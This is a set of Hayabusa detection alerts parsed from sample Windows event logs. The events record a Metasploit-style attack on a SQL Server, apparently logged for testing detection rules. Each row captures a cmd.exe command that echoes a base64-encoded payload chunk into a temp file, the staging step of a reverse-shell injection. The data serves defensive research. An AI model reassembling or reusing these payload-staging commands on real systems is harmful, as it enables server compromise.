2020-08-02 07:58:14.380 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 23QUizUwwUAAi8OLG1B8SYPERIXbdYqLRfSJABmTBF9eW4vlXSgEAJCQVYvsgxYMU4vkA1ZXVHM4q+jbCPtdEUMEg8QEhdPHBgAAAPbHqecArwAAdA1Q6M7///9xQw2qwHXzjUNZUOgZFIUAi1bjUehRCAAAi1SDNQiFwHSXi1AYpuh8+v8ni/CF9nQGVupnVAAAi0MMi0sIiQiLQww8TQB0gotTCIlCDIWudAZWsIdUAACLczCLezlXi0YQxxYAAAAA6JL6//87x+0IagBx6Of6Yf+LRwwz24XAdH4l6BdUSwAOVwSLbIlV+ItXCA07/IkGi+H4iUWti0YIhcl0CjvC3w2JHove6wWD+BRzGItMFxSFyYlSdQg7RRd2A4lF/Il0hxTrCItPFIm4iTgUO9ByBA7QcAIz0ot19Jn2HzCLU/yJpkSJB4tHDIXAdDJQ6BVU9wCF23QUizXMVEAA8cOLG1D/1oPEBIXbdfJX6Of5//87RYt1Fq3ou/lbbV9e+w7lXcIEhJCQbPSLEItFCMf7AAAAgYsHDIXAdQuLDaECQQCJTdSLwYtNEIXJdQqFwEsGi1AgiVUQU/9dFDxXhdt1A4tYGIsDvwEAxgA7x3JXi0MMhcB0BlDoHFMAALDFGIsLjUMYi9eF9nXmO9FzCxtwBINVBEKF9lDxizBtMXRTiz6F/4k4D4WKAAAxO9EPpoIAAAAMUPwa+QRJhYl1BIXVd/GJC+sTi0MUgnMUhcB0L4pDDIXegAZQFrtSAGGLxosRhfZ0DTl+CHMDNMaLNoX2dfOLOeiUwHQGUAgJUwAAaAAgmQD/FcvBQAC38IPEBIX2D4TZAAAAjUYYZoYAIAA+yAZeAFAAMn4IiVYQ70YU6zSLFokQizLki5zGA/iLQxyLz4kpt8LI/AOJQ1REQwyFwHQGUOivQAAAjU4YxwYAAABHiU4Qi34QixEAiTaJzgSNR0CJRzSJRgqJXxiLXQy6d7fdOywz9rVPIDveiQQEiXcQ7HcUifmZiXc8iXcciXckiXcoiR90YotTGFJOJ/jujjvGiUUQdAmxztotAACLdRBJSwSDwwRYVwg7zokKEAOJUQw1O47Gia4wdDRQ6CZSAOhNRQiJVV9eMwb5XcIQAItFEIXAdAdqDP/Qg8QEX164DJ4AAFtdwhAAf3cIiXe9+h8IJjhfXjPAW3LCEACQkJCQkJCQkJBoVYvsRuwgX1ZXi2QIjn3sM9uLRyxYRSKLIxCJTeCLUItKxkXwAJlVsIld9ItGEPdQGTvKdSqNVeCR6G4BAACDQQR1+P91GYtHIDvD6ztqhP/Qg8TJM8BfXluL5V3CDACLRRCLTQxQjTBNUVJoQFNAAOj7HgAAyvj/dRltRyA7w3SClzX/0FTEBF9eM8Bbi+VdwgwtAEUE2QAAi01Di1EQK8KJVdGDwAgk8QM8iUFDi0v0O2Ry0aAA8vFJfxiLRwyFcXQGUOinUAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x7e8 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:14.653 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 0FcEEg+JVWOLVwiJTQyLBotN/IniYotGCIXJdAo7wlQGiR6L3usvg/gUcwWL5JgUn8mJQYkIO0UMdkyJRaGJdIcU6wiLTxTIDol3FDvQcgQr0DZ3UNKL1viFBXWxi0UMnVcIiQeLfwyF/3QGV+iJUAAAhb50FIs1MNbYh90+ixt2/9b7xASF9jjyizQQi30IikXwhMB1C19ei8KOi+VdwgwAoU3oi0csxzUMAFoAFYtQXYlRBIkKiQGJSATvTyyLSBTwihCLMNoZ+sEAgQEAi9aB4fPw//9JwcYMiUgMi8kwO89zsYsdOxUMcl6LSASJMYsI4XAEiXEEi0oEifYEiQGJENRCBItFEI5eWz9VXcLuAJCQkJCQVULsg+yri1UTU1ZXi1oIoAL3egwrQzaJRfSNDFCD6yBzBbkgAAAAgHoQAIvBdfWLiRQrcBA7SXdxi0IEUDCJMXsIi3CoiXEEi0tYiUgEiQGJGIlDBMe4DE4AAMyJjCyLmOKLS5SLMyvBM84FAB0A4CUA8P//SMH4DDZDDF/VUXMhiwk7QQzk+YtDBIkwiwOLc1CJcASLQQSJQwSJ7IkTiVlti0cs6VoAAACLdxgrgRcQAAAlAPD//zvBiUX8D4K1AWAAPRcgAABzCoxF/AAgIgA3Rfzy+MHvDE+D//+JffgPh5oBFQA7OxuHK/oAAItGDIXAdAZQ6JVOAACDfBoUAIsajURgFIubTFX1OBA70XMJWsAEvoM4ZHTziVX4ixDf0olV8I6+nAAA8os6hRw5OHUWOU34chGLePyD6BtJhf91BIXJd7iJDotKCItGCAPBiUahixOLMMmnyJsDiUabi3YMhfZ0CRQulIQAwovs8I1CGMcCAAAAAIlCEIvJix4IikoQocl0CIsRFD/OFFoUxkIQAYtNgYtzENx4EIvZwekC8xexy4PhA/OkiUIIi0gwi/NfA87qiQqLQBRIW4lCBDPAi+W1w4uWDIXtdElW6FQaAAD3QYtOFIXJdD2LRvOFcHQJUOinTQAAi1UIV34UjUYUhf90EIsQ+DtPCHboi8eLP4X/dfCLdgyF9nQGVujtTUu0i31Ki0UqUDImXFtAAMPE6OHAdFmLt/y3UBiJUBDHPwAPAACNFAiJeAiJUBTpOSr//4uqKAiLRwiLTggDyEtGBDvIiU4IdgNtRgiLdgyF43QJVtP6TRkAi1UIjk8YxyB1JQAAiU8Qi8fGAP///+Beg8j/W4vlXcPBkN7lPUZV+3KLTd+LVQiNRRBQUVLofHHt/13DkJCQd5AokJCQkFWL7ItNCItFDIlBKF3CCACwi+wii3UIhSR0MH1GFIW9dAeLCIkgbusIaulW6D/0/wzsVQyLTZeJggSLVRSJSMvHUAyLThB3D8pGfWRdLhAAVYvsi1UIU1ZXhdJ0X4tCEIt1EIt9oo25EIXAdCA5eAR1BXxwCHSai8iLzYXAde7rDIsYiaOLShSJCIlR>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xd50 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:14.927 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo FItCOI1KOIXAdIs5eOJ1BTmiCHRPi8iLAMzAdXYrXltdWwwdixeJMYtKPIkViUI8X15bXcIMAG6QkJCQkJBGkJDbkJB5i+yLNghWi3UQ7yl9DFa0UOhZ////V//Wg8ToX15d6wwAkJCQkJCQ2pCQkJB2K5BVi+JWi2UI9waFwPAUYZaJCItQBFL/UAiLBoPE8gnAdaZeXcOQkJCQig6QapCQsZAzpcPGkJCQkE6Qz5CQhpCQVYtKg+wIU4tdiFcz/4XbhoTYAAAAVosKiwZqAchsagBQEFpNANc9dZ8BAHQHx0YEAAAAAIt2CIX2dd2L84tGBIXAdJGLDr80AAAAaglR8H4E6KBMAFaLdgiF9ojghf90yLsbtwAAVlOJdfzoGxUAAIt1CDP/MX4EaXVuxhZqAWq0agCSJPdMAAA9dhEqAHUHxwFrAADrB8dilgAAAACLDAiF9nXQhf90Kot1/IX2fyN8R4H7wMYtAAmFVlDob6oAAGoAagJWF+hEXQD+i9iJT/wfnYtdCIuag366AnUKiwZqCVCyuEsAwOZ2CIX2demLIotGBIXAdPGLDmoAagCvAFHoekwAU4t2CJr2deReX8OL5V3DkJCQWpCQkJCQyZBoVRG2vYuldjNThfZ0KzeL/oN1/9Sui0VmGdFJi7J7V1Do6/Fqv4s0V+2L0cHpAvOlf8qD4XHzpF9eXcIIAJCskJuL7INsJFNWV1p9DDPbYdKF/3QjjXVNgzj/M8DyrvePSYP7pR8FiUyd3EOLfgSDxgQD8P//deCLRQjxUnXojgH/SIvoXjPJ69yJRfRm0IlN/KxxjcMMvrL4kQOLTfxZ+QZ9CotEjcFBiU386w68/uAd/7fA8q730UlFwYuni/qLfQPQwen688KLRfiLy4PhA4PAUvOkixPqRaSF9nWOi0Vmtl/GAgBbJ+Vdw5CQDJCQVSTsg+wI6YsNyPNAkaHE80AAIxXK80AAF1aL9QxmiU0+i2oIhfZXc0X46lXpjV34f1Z8BIXJc/SLzzaLFbzzWQ6LyF9eW4nvirR/HUAAiFEEi1FdwgwAhfYLLQUIgfnNAwAAcxlhdRBRz7TzQABqBderyiwAAPI8EGnAiy8PjeWDAAB3zQAAAIvCi8GL1rkKAAAAgef/AwBZTppeAACL8ovIhTt8cH/qgfmoAwAAcgND/oF69nyJfwUk+wmcWIP5CXUMoAl1CIEEzeoAAKRHP/8ARAAAfAaDwQHWowAPvgOLdRBQUWis80AAIgVW5E4sAABgxBSFwH1tpxVI10AAm85fiXigqPNAAIhBBItLXluLY10ZCwAohL8ApQAAmYHi/wEmQwPCwb12g+uFfAiDwQGD1gAzwA++E4sUEFJQDGic80AAagUC6Jq+AACDxBiFOX0Ti8aLDaTzQACJCIoVqPNAAIhQBIvGX15bi+VdwgxhkKuQkJCQkJAEPZCQkH82VYvsU1aLsxJXajBW6I9/>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xf64 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:15.201 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo //+LXQiLFYAwQAAHfRBnA+wwLwPHQBQAAAAAi3yJUQShyMCOAIsLg8xAiUEIi6+NDL3mAJcAx6Eg7gIMAIsDUVaJkRjoSO//mot1FI0MvQAOagCJTaiL0Yv4wekC89yIyoPhA/Oki29fXolBHIsTi00M1KYcxxkBAAAAAIsxeQEAAADHQiQAAAAAi9mJQQwdEylCaosLW4neLDPAXcIQ/5BVi+xW4nUIV4tGFIXAtgiLRiCAOAB1TzxODItGGDv7x1YUAAAAALgki1ayiwSkiUYggDhndRaKUAFAhNJ0KInMIIoQgPotdR5BiU4Mx0Yg1PYUAJhNEIqHEF9eiAG4fhEBAF2zEACLViCLricPvgJCg/g6iZEQiVYXD3LQAAAAUN//FXzBQACDxHuFwA+EvQAAAICyATp0GotNFMcBAAAAAItWIF06AA9wkn0AAOmKAAAAi0ZygDgAdAeLsRRbARl0i5b/i04PiYvCg1YMO8h/ncdGINT1QQA8Bwk6dROLRRCK3hBfsIgQuH0RAQBdwhDYi0YEhcA2H4tWHMdOELnBAlDoCUkAAItOzVBo6PNAADb/VgSDNhCLRRCKAhBXW4gQuHwRTQBdwhAAi04cixSBA0UHiRDHRiDUAkGlhEYMi1UQik4QX8zAiApeWMLiAIN+EC0PhPrG//+LCOH1OgCJA/9GDItGBIXAs1YZPyu+H9VOHA5GEFCLEVLFkUgAcFCLRgggzPNAAKz/PQSDxNaLVRAIThCO7nyRAQCICl5dwhDlkJCQkJCQ++eQkLCQkJBVi+xRVrTo8QEAAIXAD4X9AAAAgz3cCEEAFA+MIQAAAHWExYkAZ8CNheEAACrHBYQDF2oBAILJVBVcwEAAi/Cv9nRQ8VgDQQBxwHUdDspy9EAAUQTox0sfo4PEDKNYA0EAhcAPhK8AAACNafxRVorQi/CF9nSAizH8i0UMUlZQ6IRIAACLTQiDxAxTiQu9FUTAQABT/3BawNAAi94w/1P/FSTBQABQ6IUAAACLlSeDxFuF/3R4jTSFUAAAAGqbFVzBQACDxM6JB/8VJPVAAItZ14FGMIvRwekC86WLQoPhA73OHv8VysBAAIt9KH5AAP/WiwgDhcl0Fv+6i2b//1XHwgAA7QD/FTDBQACDxKEzwF9e7+VdwgwATgEHFUyfQCLpbv//9JCQkJCQkJCQkJCQVYtxUYtFDFOLWBBWhdvTfRjSAQB5AGaDOAB1sWbUeALudAbbg8AC6+ArmgyDwALRS4lFELcEnQQAAGpQttjmwUAAi/iLRRCQdEABVol1/P8VXLxAAIPECI1NqIkHjVXRUVCLRUACMeg06AAAi/Bmiwcr8lZQaxUgwVv9uQFyAEB5xKg7MokHlSk6Wv+NRwSJTQxBi1D8ysICiaPVMAkWRoTSiQ119cJVDIPABEqJVQwakotqCMcESwAAAB2JOF+Lw15bi+Vdw5D4kJCQkJCQkFWL>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb0 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:15.474 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 7F3smDkAAKGIA0EAwchAhcmjiANBRvIGM8BA5WzDjVX4UujXGAAAg8Q5hcAPVoIAlgD/FWDAQACjVAlBAOjo6f//scB1c1ApUHhF/FDE7O//8oXgdAlMIjYAOYu2hpGLTfxoJPRYAFHoYfb//42VPf7///dqApcV0MFABoXArTlmi4Vo/v//PAJ16jPJisyEYXV+i1WHUhViswDrYEX8IVNpRPuSg8QIMz+L2V0w/xXUwUAAuBEAAACL5W/ykMqIA0EAyKOnA7kAlFboduon//8V1MFAAKFUCUHjUP+7ZOJAAMOQOJCNkJArkJCQkFWL7IpFZNqobHqXi0UImMcAALcAk7iHEQEAXcIQAIt9DOj/AAQAvDQTi00IuPgAAABfxwEAAwAAXcIQAFPKahBWaCQwBvPQcQTl//+LdQgzu4kGiUgEixaJegiL3408v4kYi0Qj57aJSgyLBoTiiTuSELA2ixaJiv8gAACLBomIGDAAAOjH6f/5iw5XU4mBHDC/AOi4zv//ixZeW1+JgiAwAAAzwDPCEACQkJCpkJCQVYSmi0UIU1ZXi0gEi1AIO8p1DF9euMsAAABbXQEIAJaQijBDAItdDI0niYtnjTyKuQUAAADzpf1TBEoBAAAAO9EPheIAOXOLUwyLMgSKUwiE0XQvi1AMM8mF0nYPjXAQOT50CBaDWwQ7ynLJO8p1E4H6ACwAAHMLiXyIEItIDEGJSBn2QwgEdD6LkBAQAAAzroXSBIGNrRQQAGE5PnQIQeZ5BDvKHPQ7ynUclfoABAAA2BSJvIgDWAAAi9UQEAAAQYmI/Y+NAPZDCHJ0PkGQFCD4ADMZT9J2SI2wGCAAAMI+dAj2g8apO8rD9DvKdRyB+gAEAABzD4m83RggAACLiBRlACRBiYgUIOEVFehfMCIAfgaJuBgwAACLSARf3m6JSAShwFtdwkopHF64CQAAACZdEggAkJBmkJBKo5CQkJBVYCCD/wiLRQxTVleDeLwBD4V3AQB5iwQ3lkUIM8mLUASLewS80ol9+HZiNrAcMAAAg8YMjx50FkGyxhTzyqL0X164fxEBAFv7Yl3CWgCL2UGNcv87yolwBHNPjRybjTyJweMCwZoCKwSJfQghVfyLiBwwAACLVQyLUr6NNLM7VuF1Bf9IWOsQRzwLuQUAAADmpQE5CINAuHoJ/DPHFEmJZgiJAfx1yIt9+ItQJjPJhdJ2Lo1wEDlbdAqtg8YEO1ty9OsQSjvKc91cVIgQi3LvQYkyi3AMg3EEsDtqcu//SP+LkBAQAAAzyYXSMzqNsBS3AACmPlwKw4PGBDvKcvQSJko7ynMbjZSI3hAAAItyBHqJMouwyRAAAIPCBE47zoTs/1QQEABti5AUIAAAM8lpmnaBjbAYIAAAOXR0CkHzxgQ7ynL06yZKO8pzG42UiL0gAAC9cgRBiWOLsFMgAK2DLgROO85yQP/NFHwAAIuIpDBkYTtB>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x8e4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:15.748 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo dQuFyX4HSYmIYTAAAF9ezNBbi+VdwggAX7i4lQBqcVuL5V3CCIyQkJCQkFUf7P8gMADO6JNUAIZni+oIGVeLSwTHwHVafUUUX/jzxwAAAJj9M8CL5bjpFACLdRCLfQqF9n8K0ASF/3MEM8CpJWoAaI5CD9RWV+igegAAagBoQEIPAFZXZ0Xs6E9TAACJRfCNRVO5hwQAAI1zDI295JDDH1DzpbkBBAAAh7MQ/MMAjb2vV///jZXo7v//86W5y8IAAI2zYD4AAI294Bj//42F5K7//0eljY3gz///UYsfGDAAAFJBUFH/5OXBMQCLVVAz/zvHiQIuIIs12MFAAP/WhWB3hFcBAOf/yl9eBXeW2ABbJOVdwhQAqg5fXrh3ESgAW4vCXcLNfYuWBIl9EDvAiX34DzgPAQAAiboIiX3814McMAAAA8cRmoQBD4UZAQAAi0gMzJU836//UotxBFaJdfSrhVQAAIXAdSZMhejv1v8Y6ugt9gAAhQB1FVje4M///1FW6GNUAACF5g+EYQAAAIuzHLCuFotFCNn3i7sgYAAAA/i5BQAAAPOlixkgugAAyY306MdEAssAAI0ILd///9ZX6CRUAKiLdQiFwIwPi4sgUQB4gEzjCi4ARDFUjZXo7/9FUlfIAVQAAIWudA+LPCAwAACAbjAKBI1EMAqN1vLP//9Rm+iEUwAAhcB00ouTETAAAIBMMgptjYOYCotN5ot9/EGDxhQ4TRCJdQiLRfiL6mFAg8cmfYCJRfiJffwPgvkx///VOItNFCNFHYkBnUVeO8d0CJ2TmDA11FgQX14zwFsK5V2FFGWQXrgJAAAAW4vls8IUAPOQkGhVi+zyVgZm1AyF/3UFvwIAAACLRRiLdQhQVkpxAQAAwV0Ui00Qg8RbPFFXhxW8wUCPVBZBQgSLBotABIPw/3UeizW7lEAA/yyFvw/qlAAAfvfWX14FgA4KAFtdwiEAgz3cCI4AFHxyakFqIg/0FXDArwCHNv8VbMBAAIvLx0tqAI1NDGrHIYtKBOlRUMcVaMBAAArAdIeLFotCBFCfFcBYQACLDotVDInHBItFEMRqU+xXUZa3AAAAixaDyP/DxMyJQpTWIBpAAGjgZkAA50IkiwbHQCimAAAAi+RWiw5RPCzvrf9fXjPAWLHCkgDCkJDAi+xWk3UIi0Yug/j/dClQ/xXAwUAAi/j/dRaLNdh4QAD/1oWNdCkT1gWA/AqYXl3Dx0YE/////4tGTlLAdGOLQBBQV9vGwEAAx0ZAAAAAADPAXl3DLJCukJCQo5DckNlVaOyLRRCLTRRWi3UIV+jNDItWEGoAV1KJRq6cThanbQYAAF9GaGoAoVDoYQadAIPEGF9eXcM6kJC9kLGQkJCQVYvsU4sjDFZXalBT6M/i//+LdQiL+DPAi9ehjQAAACY4MKvCUIkQigaLCKnolHZi/4v4M8CL17kOAAAA86uLBmo4iVAQiw6L>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xed0 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:16.021 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo URSJGosGiwhR6Iri//+L+DPAi9cTDgD5APNCJAZx3Gdqg4lQYJkOi1EUoBqLBsdANAEAAACLDoPBSFHoc/j//yRlW13DkJCQVfDsVov6CGjg21oAVosGquhm7v//Vui1/v//bMQEXqjCBACQkJCQkJCQkJCQpJCQ/YsNgewQAgAzU4tdCFZXCUP+g/j/D4SUAQAAi0IQhcnChIkBhwCLdQyLTruNVhNRUun/FaTPQACD+NIPhTd/AACLNdjBQAD/1oXAhIT5AAAA/9YFgPwKAD2zIwsAD4VRAQCshXsgi3Mki8cLxqEOX164tCMLn1ukMevCCDuLQwQPAXMAAMH2iS30/f//iY3w/f//iYX4/v//E430/v//fwp8BB//cwQzwP0lxchoQEIPAFZX6JdMAABqAGhAmZcAVrKJRe3oRk4AAIlP/FNF+I2N9BX/8lCNlfBB//9RUmoArkH/FcTBQACD+P+JRQh0TYXAdQ5fXrjMIwsAW4t6Z8IIAItL8Y2F9P7/2FDj6A1QAAA2wHRei0sEuVUMjUUIUlBoBxAAAGj/ywC9icdFCgQAAAD/CKDBQACFwDEnizXYwUBU/9aFwHXbX28z1FuL5V3CCAD/1l9eBS78CgBbdTpdwggAixQIhbVv619eW4vl6MIIAMFOAotDEIlzFGaD6ioAaBLHriyvGwAAxkgYi3AgsywEQQcz0vOmdV5fx30LAQAAAI9/wFuL5TrCCBW4wHUJAF9eW4vlXcIIdJBNkFWL7IObCEXyuVZP/xV4wEAAi1X8i0X4MywzyVLWyAvIagqhUeiNS2wALQDmhkjigdqWXikTi+Vdw5DPcpCQkJBV1YyLDQwzyU8z9maL+g4ofokcSwSNFC2LTabb4gOJETPSZotQ1KNRIDNF/4tQg4BRCDNQ14tQCCFRDDPSsYtQBolREN3SZotQe0qJURQzs2aLEM0LbAcAAIlRGDPSZotQkYm+HItHDWaLFgaLTKJAqUDdjVQy/zP2iVE2M9KJYCSJRbRmnDCLxmEDMgCAeQX2g8hmE/Uqi8aemb+QtgAA92xfhYN1GovGvsXq9ACZ9/6F0nTDi5Igg/g6fgS5PUEgXjF2kJCQkJCQkJDtkCmQ+rzsgey1AAAAU1ZkdQtXi32Hi4GLxyEABdlAhkJqCrXRlosp8lFQ6ASEAACJRbKLwsMGHx+5CEEAiVXwg/gUD4xJANwAjU38UfeyAfkAnsQEjfbc/5nsUlB7FUHAQACLRfyNTcqNVTRRUsT/FYzAQI2LXcKNhcz2U9+J/v80g8QImwCvQEIPAFZK6HBLAOCJA41V9I1FzFJQ/xWIwEAATNWSi0X0XvYzyQv4VgvIagpSUejJSQAAwABjl0hlgRiWXikAaEBCD35ShuixSQAAmvcBHgAXPUIPAFF2gvDonkkApItNi0X8EnMoi1xUiwgD+biJiIiI9++LyrjFd6KRA8/B+QUW0cHqHwPK>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x988 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:16.295 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 9+4D1tb6Cy7CldHB6B8DaxBDJF8tM8BbCuVdwsQAjU306VXsUdT/FYRKuACTRdx1TfRQEP8VfMBrDYtdV41V3FIn6N7J/9yDxAhqh2hAQg8tP1fo3XYAAInojYUg/4X/UP8VgMBAADPJK050mUh0skiDcIuNIP+o/4tVyF/HQyQBAADRjQTlXovIweF+K4/32cHhAolLmDPAW4vlXcJMAIuVdv///9eFdLVS/wNNiUski8hfweEEK8gV99nB4QKJSygzwFuLEl2oDACLhSD//7WJSyS80MHiBCvQ99rB4gKJUyhfXjPAW/rlXcIMAJCQDpCQkJBVi+yhQAVBmoXAdSp6QASaAP+AgMBAAC/sBEE/i0WoxxJABe4AAQAAAGcAQARBAKHsBMQAXXGLTTvHAX4EuACh7ARBAF3DkJCQkJCQkJCQCFWL7ItFUYtNCGqyWugDAIZQUegZQwAAUP+IkMBA113CCACQ5e6QkJCQkJCQkJCKkFWL7ItFEFYdswxXi30Ii0ggnFDlVldRUujjPwAAgwMQhcZ1Ll+4HABrAF5dwgwAxvFB/7VfM8BeXRkMAJCQkJBV91VTi10MVot1CFeLffvOz/+JXhACiV5QdA9X/3WowQcAZolGKkh7bbWD+0RquLgQAAAsx0ZiBNIAUolGCYlGtI1GSYmrIF9eW13DkJAqkFXq7I5FCMVNDGZVEFM5XS1WxwAAAAAAnscBAAAAAIv7g8n/M8DgxwIAAPKu9xlJjdGv/zvzi/5yPKGMwUCsgzhKsykLZtsEiotR/xVoAkAAg8QI6xGheNxAADPSiheLCIoEUYPgBIXADwdPO/tzyusELPtzJVMZFWxpQA0nxASD+AF8Iz3//wAAmRz6VRBf2qRmidMmT13CxgCAPzp1Njv+czI7+3UMX14qFgAAAI8ewhQIEkcBdv8VbMFAALDEBIP4AXxOPf//ZAB/pItNEI13/2aJdisNi0UYRovevlNaUrXoWdv//4u5CIt1FKzLOZCJAovBwekC86WLyIMrA2LA86SLCl9exgQLAFtdwhRDVYvnDV0Yi1UIi8FWi3UMg+ADV8cCAACTAHQrhfZ0HIt9rAj/dRWD+AOyEPbBAnQdXxyHEQEAXgXCGPhfuBYAAABvXcIYAIuqEIXAdQW4AgBbAIt9HFe8i017UVBWUujSAAAAg8QYX9ZdwhiPkJC9kFWL7IPsJFNWi/0MM9sj81dOdfR1Bb5A9EAAigY8fA+MuQAAADyCDwSXABgAaDT0QABW/xUcwcIuixyLIYPJJDN2I8QI8q730Uk70Q+FjAAAAFb/FcjBhACJRSyNW/hpTeyNVdyJReyJXfCJTeiJVe1KBAyLSAzFGQ+EqBcQAIld/ItVHGo4EXjF2v//i/gzwIv3uQcAAF/zq4tFHItNDIt9/IkGi1EMiwRMi1UUUmoCi9BWiUks6HX9//+DZgyF23VDi0X0FMB0DVCLRRxQ>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x934 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:16.568 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 6N3n/w6JRgSLGAiJJusxVv9DrMFA9jsUibkMdYWLNQvBQHX/KS/AdC//1pOkBYD8CgCUPuVdw4tTBMFWBIlzJItFDCBuBIveibv8Y0gugzwPAA+FW5j/Sl9e7+tbwlFdw5BVizeBOlQCAACLTThTVjP2iwGLUQSJRfSLRRBXiXXsigCJ5eOEwCF14Ilk8Il12IlV3A+EhwoAAIuHUjzHdDwqRfSFwHQtO6HccvkIfQxXiQf/VQiDxASFwA+LlAoAAItPBAF7iU3ci1VGQIlF9IoKiEj//0Wp6awKdQDjfT+LDXXBQAC4AQDQADMqJDkBiUW8/0XAiVXIiVXEiVXUxkVbIIpV+4kEiJISihdqXFL/FWgNRniDxKsz0ushi8R4wUAAM8DIB4sJigQ3g4wCO8KhmMmQAAC5rQAAAIoHPC11BjhVwI/r9DwrdQYecsRH6+o8I3UGiYXUR+sthyCuButNyEfr1jwwdQaITd9H68yhdMFAAIl9EAcIfhQzyb0Eig+z/xVowUAAg8QIM1U/EosNCcEIAH3AigeLCYoEQYPgBGeQdF0Pvg+D6TBHieQQixV0wUAA8E3ggzoBfhUzwGoEigdQ/xVo0Tr9i03gMsQI6xGheIvKQzPSiheLAIpu18XgBEzSO8J0Ig8yb48MiRKNTErQ67mJfRDHcDIBUwC56yaAPip1HosDmcNRRzvCiX0Qx0XMAQAAhn0FfJzA99iJRQuKA4ngzFTsLg+F0QAAAKF0O0AAR7hF5AEAAACJXxCDODJ+1TPJKgSKD1H/FWjBQPSDXQjC0uuQiw14wUAAM8CKB4sJigRBg+AEO2N0Tw8TD/npMEeJd5+L+HTBQACJTfCDOk5+FTPAagSKB1D/Fce1QACLTfCDxFTrEaFmwUAAM9IZe4sAigRQ0bUEhcB0JbG+h40MiUeNTErQ67uAPyp1NosDg8MERzPJO8IPnClJI8iJTfCJFRBqA2hU9EA6V/8VNMFAAIPE84XAdMWKBzxxdYf4O0frMYlVBOvbiVXuylV+69M8bHUIuAEAAB9H6xg8aHUruAIAAABN6wzomgCqAGYIM8CDxwOJmRCLVZLgwg+++YM8eA953Vm4NjPSipcEfECz3CSV6HtAAIXAViKLSwSNVfyRA1Iwyqxvw5hSjVXQUmoBUVBFcg3NAIPEGOuOg/iW9xCD+AL+C4Py6DPhZotD/OsFiwODwwSNTfyNVaxRRk3QUlFqAVCJcNjo3AwA24PJFIuPi0XkD8CWxrs4ewCLRV6eUAGB+gC2AAByarj/AQAAOUX8D4POAwAATsYG